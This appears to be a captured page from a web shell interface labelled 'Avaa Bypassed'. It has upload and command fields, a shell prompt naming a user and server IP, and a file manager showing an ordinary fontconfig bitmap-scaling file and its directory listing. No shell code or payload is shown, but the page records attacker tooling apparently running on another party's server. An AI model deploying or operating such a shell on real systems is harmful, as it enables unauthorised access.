[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.191.195.57: ~ $
<?xml version="1.0"?>
<!DOCTYPE fontconfig SYSTEM "fonts.dtd">
<fontconfig>
<!--
  If font is bitmap, calculate scale factor.
  Note that color bitmap fonts have scalable=true, while
  non-color ones have scalable=false.  Both groups have outline=false.
  -->
<match target="font">
  <test name="outline" compare="eq">
    <bool>false</bool>
  </test>
  <edit name="pixelsizefixupfactor" mode="assign">
    <divide>
      <name target="pattern">pixelsize</name>
      <name target="font"   >pixelsize</name>
    </divide>
  </edit>
</match>
<!--
  For non-scalable bitmap fonts (ie. non-color), skip
  minor scaling if hinting is enabled.
  -->
<match target="font">
  <test name="outline" compare="eq">
    <bool>false</bool>
  </test>
  <test name="scalable" compare="eq">
    <bool>false</bool>
  </test>
  <test name="hinting" compare="eq">
    <bool>true</bool>
  </test>
  <edit name="scalingnotneeded" mode="assign">
    <and>
      <less>
        <name>pixelsizefixupfactor</name>
        <double>1.2</double>
      </less>
      <more>
        <name>pixelsizefixupfactor</name>
        <double>0.8</double>
      </more>
    </and>
  </edit>
</match>
<match target="font">
  <test name="scalingnotneeded" compare="eq">
    <bool>true</bool>
  </test>
  <edit name="pixelsizefixupfactor" mode="assign">
    <double>1.0</double>
  </edit>
</match>
<!--
  If we *are* going to scale, go ahead and do it.
  -->
<match target="font">
  <test name="outline" compare="eq">
    <bool>false</bool>
  </test>
  <test name="pixelsizefixupfactor" compare="not_eq">
    <double>1.0</double>
  </test>
  <edit name="matrix" mode="assign">
    <times>
      <name>matrix</name>
      <matrix>
        <name>pixelsizefixupfactor</name> <double>0</double>
        <double>0</double> <name>pixelsizefixupfactor</name>
       </matrix>
    </times>
  </edit>
  <edit name="size" mode="assign">
    <divide>
      <name>size</name>
      <name>pixelsizefixupfactor</name>
    </divide>
  </edit>
</match>

</fontconfig>

Filemanager

Name Type Size Permission Actions
10-hinting-slight.conf File 463 B 0644
10-scale-bitmap-fonts.conf File 1.96 KB 0644
20-unhint-small-dejavu-sans.conf File 856 B 0644
20-unhint-small-vera.conf File 1.23 KB 0644
25-no-bitmap-fedora.conf File 1.13 KB 0644
25-unhint-nonlatin.conf File 3.18 KB 0644
30-metric-aliases.conf File 13.19 KB 0644
30-urw-aliases.conf File 889 B 0644
40-nonlatin.conf File 5.06 KB 0644
45-generic.conf File 3.22 KB 0644
45-latin.conf File 6.21 KB 0644
49-sansserif.conf File 545 B 0644
50-user.conf File 673 B 0644
51-local.conf File 189 B 0644
57-dejavu-sans.conf File 1.96 KB 0644
60-generic.conf File 1.75 KB 0644
60-latin.conf File 1.79 KB 0644
61-stix.conf File 1.83 KB 0644
61-urw-bookman.conf File 1021 B 0644
61-urw-c059.conf File 1003 B 0644
61-urw-d050000l.conf File 1022 B 0644
61-urw-fallback-backwards.conf File 3.18 KB 0644
61-urw-gothic.conf File 913 B 0644
61-urw-nimbus-mono-ps.conf File 899 B 0644
61-urw-nimbus-roman.conf File 877 B 0644
61-urw-nimbus-sans.conf File 1.54 KB 0644
61-urw-p052.conf File 975 B 0644
61-urw-standard-symbols-ps.conf File 1.04 KB 0644
61-urw-z003.conf File 865 B 0644
65-fonts-persian.conf File 9.88 KB 0644
65-nonlatin.conf File 7.75 KB 0644
69-unifont.conf File 672 B 0644
80-delicious.conf File 422 B 0644
90-synthetic.conf File 1.7 KB 0644
README File 978 B 0644